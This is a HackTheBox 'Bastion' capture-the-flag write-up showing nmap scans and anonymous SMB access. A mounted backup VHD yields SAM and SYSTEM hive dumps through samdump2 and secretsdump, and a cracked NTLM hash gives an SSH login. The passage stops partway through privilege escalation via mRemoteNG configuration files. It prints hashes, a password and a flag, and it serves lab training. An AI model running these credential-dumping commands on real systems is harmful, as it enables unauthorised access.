HTB Bastion Writeup
HTB Bastion Writeup

HackTheBox Bastion – Today we are solving another HTB Machine – Bastion , and will learn some cool hacking/ CTF stuffs.

As always we run a minimal nmap scan.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ nmap bastion.htb   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 19:13 IST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds

and from the initial scan , lets scan the mentioned ports only for more information.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo nmap -sV -sC -A -O -p22,135,139,445 bastion.htb -oA bastion -vv
[sudo] password for abhinav: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 19:15 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Initiating Ping Scan at 19:15
Scanning bastion.htb (10.10.10.134) [4 ports]
Completed Ping Scan at 19:15, 0.23s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:15
Scanning bastion.htb (10.10.10.134) [4 ports]
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Completed SYN Stealth Scan at 19:15, 0.27s elapsed (4 total ports)
Initiating Service scan at 19:15
Scanning 4 services on bastion.htb (10.10.10.134)
Completed Service scan at 19:15, 6.71s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against bastion.htb (10.10.10.134)
Retrying OS detection (try #2) against bastion.htb (10.10.10.134)
Initiating Traceroute at 19:15
Completed Traceroute at 19:15, 0.19s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:15
Completed Parallel DNS resolution of 1 host. at 19:15, 0.03s elapsed
NSE: Script scanning 10.10.10.134.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 12.47s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Nmap scan report for bastion.htb (10.10.10.134)
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2021-07-20 19:15:33 IST for 24s

PORT    STATE SERVICE      REASON          VERSION
22/tcp  open  ssh          syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=7/20%OT=22%CT=%CU=34383%PV=Y%DS=2%DC=T%G=N%TM=60F6D395%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=A)
OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 0.005 days (since Tue Jul 20 19:09:08 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -38m18s, deviation: 1h09m14s, median: 1m39s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 9831/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 26941/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 57335/udp): CLEAN (Failed to receive data)
|   Check 4 (port 18741/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-20T15:47:29+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-20T13:47:26
|_  start_date: 2021-07-20T13:41:01

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   175.65 ms 10.10.14.1
2   176.04 ms bastion.htb (10.10.10.134)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.02 seconds
           Raw packets sent: 50 (3.604KB) | Rcvd: 49 (3.436KB)
                                                                                
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ 

We see some interesting information in the nmap detailed scan, we have SSH, SMB, Windows Server 2016 and more.

I think for me and everyone else , SMB is most exciting piece to check first most of the times.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient --list //bastion.htb/ -U ""
Enter WORKGROUP\'s password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

From the above we can infer we should focus on bakups folder.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient //bastion.htb/Backups -U ""
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 15:32:11 2019
  ..                                  D        0  Tue Apr 16 15:32:11 2019
  note.txt                           AR      116  Tue Apr 16 15:40:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 18:13:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 18:14:02 2019

		7735807 blocks of size 4096. 2763249 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

The interesting entries are note.txt which we will fetch using get in smb( above snip), WindowsImageBackup would be too large usually over the vpn.

Content of note.txt are below

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ls | grep note
note.txt
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

So the other piece if information is the WindowsImageBackup, let see more into that.

                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient //bastion.htb/Backups -U ""                                                                                                                                                                                              130 
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 15:32:11 2019
  ..                                  D        0  Tue Apr 16 15:32:11 2019
  note.txt                           AR      116  Tue Apr 16 15:40:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 18:13:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 18:14:02 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> ls
  .                                  Dn        0  Fri Feb 22 18:14:02 2019
  ..                                 Dn        0  Fri Feb 22 18:14:02 2019
  L4mpje-PC                          Dn        0  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
  .                                  Dn        0  Fri Feb 22 18:15:32 2019
  ..                                 Dn        0  Fri Feb 22 18:15:32 2019
  Backup 2019-02-22 124351           Dn        0  Fri Feb 22 18:15:32 2019
  Catalog                            Dn        0  Fri Feb 22 18:15:32 2019
  MediaId                            An       16  Fri Feb 22 18:14:02 2019
  SPPMetadataCache                   Dn        0  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351\"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
  .                                  Dn        0  Fri Feb 22 18:15:32 2019
  ..                                 Dn        0  Fri Feb 22 18:15:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 18:14:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 18:15:32 2019
  BackupSpecs.xml                    An     1186  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> 

Lets mount one of these vhd(s) to our local machine as we clearly read in notes downloading is not an option.

We will use qemu-utils which can be installed if not already

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo apt-get install qemu-utils
[sudo] password for abhinav: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.10.0-kali3-amd64 python3-gevent python3-gevent-websocket python3-greenlet python3-jupyter-core python3-m2crypto python3-nbformat python3-parameterized python3-plotly python3-zope.event
Use 'sudo apt autoremove' to remove them.
Suggested packages:
  debootstrap qemu-block-extra
The following NEW packages will be installed:
  qemu-utils
0 upgraded, 1 newly installed, 0 to remove and 28 not upgraded.
Need to get 1,205 kB of archives.
After this operation, 6,224 kB of additional disk space will be used.
Get:1 https://hlzmel.fsmg.org.nz/kali kali-rolling/main amd64 qemu-utils amd64 1:5.2+dfsg-10+b2 [1,205 kB]
Fetched 1,205 kB in 8s (158 kB/s)                                                                                                                                                                                                           
Selecting previously unselected package qemu-utils.
(Reading database ... 385831 files and directories currently installed.)
Preparing to unpack .../qemu-utils_1%3a5.2+dfsg-10+b2_amd64.deb ...
Unpacking qemu-utils (1:5.2+dfsg-10+b2) ...
Setting up qemu-utils (1:5.2+dfsg-10+b2) ...
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.2.3) ...
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ 

Lets mount vhd – 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd now, you can search for how to do this.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mkdir /mnt/L4mpje-PC
[sudo] password for abhinav: 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mkdir /mnt/vhd      
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo modprobe nbd                                                                                                                                                                                                                    1 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mount -t cifs //bastion.htb/Backups/WindowsImageBackup/L4mpje-PC  /mnt/L4mpje-PC/ -o user=anonymous
Password for anonymous@//bastion.htb/Backups/WindowsImageBackup/L4mpje-PC: 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"                                                                                                                     1 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mount -r /dev/nbd0p1 /mnt/vhd                                                                              
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ 

Now that the vhd 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd is mounted, we can see the contents of this .

$ cd /mnt/vhd
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ ls -la        
total 2096745
drwxrwxrwx 1 root root      12288 Feb 22  2019  .
drwxr-xr-x 4 root root       4096 Jul 21 01:04  ..
drwxrwxrwx 1 root root          0 Feb 22  2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root         24 Jun 11  2009  autoexec.bat
-rwxrwxrwx 1 root root         10 Jun 11  2009  config.sys
lrwxrwxrwx 2 root root         14 Jul 14  2009 'Documents and Settings' -> /mnt/vhd/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22  2019  pagefile.sys
drwxrwxrwx 1 root root          0 Jul 14  2009  PerfLogs
drwxrwxrwx 1 root root       4096 Jul 14  2009  ProgramData
drwxrwxrwx 1 root root       4096 Apr 12  2011 'Program Files'
drwxrwxrwx 1 root root          0 Feb 22  2019  Recovery
drwxrwxrwx 1 root root       4096 Feb 22  2019 'System Volume Information'
drwxrwxrwx 1 root root       4096 Feb 22  2019  Users
drwxrwxrwx 1 root root      16384 Feb 22  2019  Windows

Dumb me tried to search for the user flag but no luck, however the output of few folders were as below.

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ cd Users   
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users]
└─$ ls    
'All Users'   Default  'Default User'   desktop.ini   L4mpje   Public
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users]
└─$ cd L4mpje 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ ls
 AppData             Documents         Music                                                     NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms   Pictures       SendTo
'Application Data'   Downloads        'My Documents'                                             NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms   PrintHood     'Start Menu'
 Contacts            Favorites         NetHood                                                   ntuser.dat.LOG1                                                                                Recent         Templates
 Cookies             Links             NTUSER.DAT                                                ntuser.dat.LOG2                                                                               'Saved Games'   Videos
 Desktop            'Local Settings'   NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf   ntuser.ini                                                                                     Searches
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ cd Desktop 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Desktop]
└─$ ls
desktop.ini
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Desktop]
└─$ cd ..     
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ cd Documents 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Documents]
└─$ ls
 desktop.ini  'My Music'  'My Pictures'  'My Videos'
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Documents]
└─$ cd ..    

When on Windows box, it is crime not to see config folder in system32 to see if we can get hold of any users, or hashes, so let’s get there .

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ cd Windows/System32/config/   
                                                                                                                                                                                                                          
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Windows/System32/config]
└─$ ls -la
total 74740
drwxrwxrwx 1 root root    12288 Feb 22  2019 .
drwxrwxrwx 1 root root   655360 Feb 22  2019 ..
-rwxrwxrwx 2 root root    28672 Feb 23  2019 BCD-Template
-rwxrwxrwx 2 root root    25600 Feb 23  2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 Feb 22  2019 COMPONENTS
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root   524288 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 2 root root   524288 Jul 14  2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root     1024 Apr 12  2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 DEFAULT
-rwxrwxrwx 1 root root     1024 Apr 12  2011 DEFAULT.LOG
-rwxrwxrwx 2 root root    91136 Feb 22  2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 DEFAULT.LOG2
drwxrwxrwx 1 root root        0 Jul 14  2009 Journal
drwxrwxrwx 1 root root        0 Feb 22  2019 RegBack
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SAM
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SAM.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SAM.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SAM.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SECURITY
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SECURITY.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SECURITY.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 Feb 22  2019 SOFTWARE
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root  9699328 Feb 22  2019 SYSTEM
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SYSTEM.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SYSTEM.LOG2
drwxrwxrwx 1 root root     4096 Nov 21  2010 systemprofile
drwxrwxrwx 1 root root     4096 Feb 22  2019 TxR

As we can read, so let’s get the dump of SAM and SYSTEM to see more, we can do so using samdump.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cp /mnt/vhd/Windows/System32/config/SYSTEM .
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cp /mnt/vhd/Windows/System32/config/SAM .   
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ls
bastion.gnmap  bastion.nmap  bastion.xml  note.txt  SAM  SYSTEM

Lets use samdump

                                                                                                                                                                                                                                           
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ samdump2 ./SYSTEM ./SAM                                                                                                                                                                                                            255 
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
 

We already have some information we were looking for but another tool to do same can be Secretsdump

                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up... 
      

You can use your favourite hash cracker or online repos to uncover the hash for L4mpje

crackstation got some hash uncovered

So have some juicy information L4mpje : bureaulampje , next what ? SSH

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ssh L4mpje@bastion.htb         
The authenticity of host 'bastion.htb (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? Yes
Warning: Permanently added 'bastion.htb,10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@bastion.htb's password: 
Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>cd Desktop                                                                                       

l4mpje@BASTION C:\Users\L4mpje\Desktop>ls                                                                                       
'ls' is not recognized as an internal or external command,                                                                      
operable program or batch file.                                                                                                 

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir                                                                                      
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\Desktop                                                                                           

22-02-2019  16:27    <DIR>          .                                                                                           
22-02-2019  16:27    <DIR>          ..                                                                                          
23-02-2019  10:07                32 user.txt                                                                                    
               1 File(s)             32 bytes                                                                                   
               2 Dir(s)  11.295.985.664 bytes free                                                                              

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt                                                                            
9bfe57d5c3309db3a151772f9d86c6cd                                                                                                
l4mpje@BASTION C:\Users\L4mpje\Desktop>   

So we now have user flag in the usual path (Desktop/user.txt).

Lets try to get the root.txt

Privilege Escalation

traversing some directories we notice something interesting,

l4mpje@BASTION C:\Users\L4mpje\Desktop>cd ..                                                                                    

l4mpje@BASTION C:\Users\L4mpje>cd appdata                                                                                       

l4mpje@BASTION C:\Users\L4mpje\AppData>cd roaming                                                                               

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>dir                                                                              
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\AppData\Roaming                                                                                   

22-02-2019  15:01    <DIR>          .                                                                                           
22-02-2019  15:01    <DIR>          ..                                                                                          
22-02-2019  14:50    <DIR>          Adobe                                                                                       
22-02-2019  15:03    <DIR>          mRemoteNG                                                                                   
               0 File(s)              0 bytes                                                                                   
               4 Dir(s)  11.295.985.664 bytes free                                                                              

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>  

mRemoteNG is an interesting entry , is an open-source software fork of mRemote , this saves
information in confCons.xml that we can locate and analyze.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>cd mRemoteNG                                                                     

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                                    
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                                         

22-02-2019  15:03    <DIR>          .                                                                                           
22-02-2019  15:03    <DIR>          ..                                                                                          
22-02-2019  15:03             6.316 confCons.xml                                                                                
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup                                                     
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup                                                     
